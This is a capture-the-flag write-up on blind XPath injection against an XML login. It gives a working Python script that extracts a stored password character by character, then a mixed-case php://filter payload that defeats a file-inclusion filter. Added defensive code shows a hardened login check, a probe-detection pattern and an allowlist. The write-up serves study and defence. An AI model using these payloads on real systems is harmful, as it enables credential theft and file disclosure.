The challenge tests XPath injection.

Opening the page shows a login form. I typed an arbitrary username and password and clicked login; the page replied "login timed out, please refresh the page". In F12 you can see a token is used, and it rotates fairly quickly. After refreshing and logging in again, I captured the request: it goes to login.php and the body is XML. I tried XXE, which did not work, so XPath blind injection is the way to go (see: XPath injection explained).

Probing with injection payloads shows that when the injected condition is true the page responds with "非法操作" (illegal operation), and when it is false it responds with "username or password incorrect". That difference is the boolean oracle the script below relies on.

Script:
```python
import re
import requests


def req(username):
    url = 'http://0a92d237-bdc8-443b-ae58-0693cf408aac.node3.buuoj.cn/login.php'
    password = ''
    s = requests.session()
    # Fetch the login page first to pick up the short-lived token (same session).
    r = s.get(url).content
    m = re.search(r'value="(.*?)" />', r.decode('utf-8'))
    token = m.group(1)
    headers = {
        'Content-Type': 'application/xml',
    }
    data = ('<username>' + username + '</username>'
            '<password>' + password + '</password>'
            '<token>' + token + '</token>')
    r = s.post(url, data=data, headers=headers).content
    # Boolean oracle: a true condition makes the server answer "非法操作".
    if '非法操作' in r.decode('utf-8'):
        return 1
    else:
        return 0


flag = ''
for i in range(1, 50):
    print(i)
    for j in range(32, 127):
        # The document was walked one level at a time with the payloads below
        # (node names first, then the target field); only the last one is active.
        #username = "' or substring(name(/*[1]),{},1)='{}' or '1".format(i,chr(j))
        #username = "' or substring(name(/root/*[1]),{},1)='{}' or '1".format(i,chr(j))
        #username = "' or substring(name(/root/accounts/*[1]),{},1)='{}' or '1".format(i,chr(j))
        #username = "' or substring(name(/root/accounts/user/*[1]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/user/*[2]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/user/*[3]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(/root/accounts/user[1]/username,{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(/root/accounts/user[2]/username,{},1)='{}' or '1".format(i, chr(j))
        username = "' or substring(/root/accounts/user[2]/password,{},1)='{}' or '1".format(i, chr(j))
        if req(username) == 1:
            flag += chr(j)
            print(flag)
            break
```
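The injection works because the server splices the submitted username straight into an XPath expression and then leaks a true/false result through two different error messages. The following is an added example, not the challenge's own code: it shows the concatenation pattern that the payloads above exploit, a hardened credential check that keeps user input out of the XPath expression entirely, and a small request-level check that flags the blind-enumeration payloads seen in this writeup. The XML user store, the account values and the function names are constructed for the example; the document layout (/root/accounts/user with username and password children) mirrors what the script enumerated.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Constructed sample store in the layout the writeup enumerated; values are made up.
ACCOUNTS_XML = """<root>
  <accounts>
    <user><username>guest</username><password>guest123</password></user>
    <user><username>admin</username><password>s3cr3t!</password></user>
  </accounts>
</root>"""


def build_vulnerable_query(username: str, password: str) -> str:
    """The string-concatenation pattern that makes the login injectable.

    Returned only so the effect of a payload can be inspected; a quote in
    either field changes the structure of the expression instead of its data.
    """
    return ("/root/accounts/user[username='" + username
            + "' and password='" + password + "']")


def safe_authenticate(xml_doc: str, username: str, password: str) -> bool:
    """Hardened check: the XPath is a constant, user input never enters it.

    Credentials are compared in application code with a constant-time
    comparison; both fields are always compared so the result does not leak
    whether the username exists. (A real store would hold password hashes,
    the plaintext here mirrors the challenge's layout.)
    """
    root = ET.fromstring(xml_doc)
    for user in root.findall("./accounts/user"):
        stored_name = user.findtext("username", "")
        stored_pw = user.findtext("password", "")
        name_ok = hmac.compare_digest(stored_name.encode(), username.encode())
        pw_ok = hmac.compare_digest(stored_pw.encode(), password.encode())
        if name_ok and pw_ok:
            return True
    return False


# Quote followed by a boolean operator, or an XPath function call, inside a
# credential field is the signature of the probes used in this writeup.
XPATH_PROBE = re.compile(
    r"""['"]\s*(or|and)\b|\b(substring|name|count|string-length|contains)\s*\(""",
    re.IGNORECASE,
)


def is_suspicious_login(username: str, password: str) -> bool:
    """Detection helper: True when either field looks like an XPath probe."""
    return bool(XPATH_PROBE.search(username) or XPATH_PROBE.search(password))


if __name__ == "__main__":
    probe = "' or substring(/root/accounts/user[2]/password,1,1)='s' or '1"
    print(build_vulnerable_query(probe, ""))
    print(safe_authenticate(ACCOUNTS_XML, "admin", "s3cr3t!"))
    print(safe_authenticate(ACCOUNTS_XML, probe, ""))
    print(is_suspicious_login(probe, ""))
```

Two points beyond the code: the caller of safe_authenticate should return one identical message for every failed login, since the challenge was only solvable because "非法操作" and "username or password incorrect" distinguished true from false; and if a real XPath engine must be used, bind user values as XPath variables (lxml's xpath() accepts keyword variables, for instance) rather than formatting them into the expression.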
After recovering the account and password, log in and notice the URL parameter ?file=welcome. F12 reveals the string ZmxhZyBpcyBpbiAvZmxhZwo=, which base64-decodes to a hint that the flag is in /flag. So this is a file inclusion. The filter blocks "php" and "base", but it is case-sensitive, so mixed case bypasses it:

pHp://filter/convert.Base64-encode/resource=/flag

F12 then shows a base64-encoded string; decode it to get the flag.
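The bypass works because a case-sensitive substring denylist is the wrong control for an include parameter. As an added example, not code from the challenge, the block below reproduces that denylist in Python (assuming, as the writeup describes, that it rejects any value containing "php" or "base"), shows the mixed-case value slipping through, and contrasts it with an allowlist that maps the parameter to a fixed set of pages and refuses any stream-wrapper syntax outright. The page names and paths are constructed.

```python
import re

# Assumed shape of the challenge's filter: case-sensitive substring denylist.
BLOCKED_SUBSTRINGS = ("php", "base")

# Constructed allowlist: the only pages the ?file= parameter may select.
PAGES = {
    "welcome": "pages/welcome.php",
    "profile": "pages/profile.php",
}

# Any "scheme://" prefix (php://, file://, data://, ...) regardless of case.
WRAPPER_SYNTAX = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def denylist_allows(value: str) -> bool:
    """The weak control: True when the value passes the denylist."""
    return not any(bad in value for bad in BLOCKED_SUBSTRINGS)


def allowlist_resolve(value: str):
    """The hardened control: return a fixed path for a known page, else None.

    Wrapper syntax is rejected before the lookup so the refusal is explicit
    in logs even though an unknown key would fail the lookup anyway.
    """
    if WRAPPER_SYNTAX.match(value):
        return None
    return PAGES.get(value)


if __name__ == "__main__":
    bypass = "pHp://filter/convert.Base64-encode/resource=/flag"
    print(denylist_allows("php://filter/convert.base64-encode/resource=/flag"))
    print(denylist_allows(bypass))          # the denylist lets this through
    print(allowlist_resolve(bypass))        # the allowlist does not
    print(allowlist_resolve("welcome"))
```

Lower-casing the value before the denylist check would close this particular bypass, but a denylist still has to anticipate every wrapper and encoding; mapping the parameter to a fixed set of files removes the guessing game.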